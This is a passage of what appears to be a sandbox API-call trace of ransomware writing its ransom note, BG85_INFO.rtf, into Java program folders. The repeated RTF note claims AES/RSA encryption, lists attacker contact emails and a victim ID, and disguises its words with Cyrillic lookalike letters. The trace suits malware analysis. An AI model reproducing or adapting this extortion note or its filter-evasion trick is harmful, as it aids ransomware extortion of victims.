d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.748] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.881] CloseHandle (hObject=0x1dc) returned 1 [0135.883] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\bg85_info.rtf")) returned 0xffffffff [0135.884] GetLastError () returned 0x2 [0135.884] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 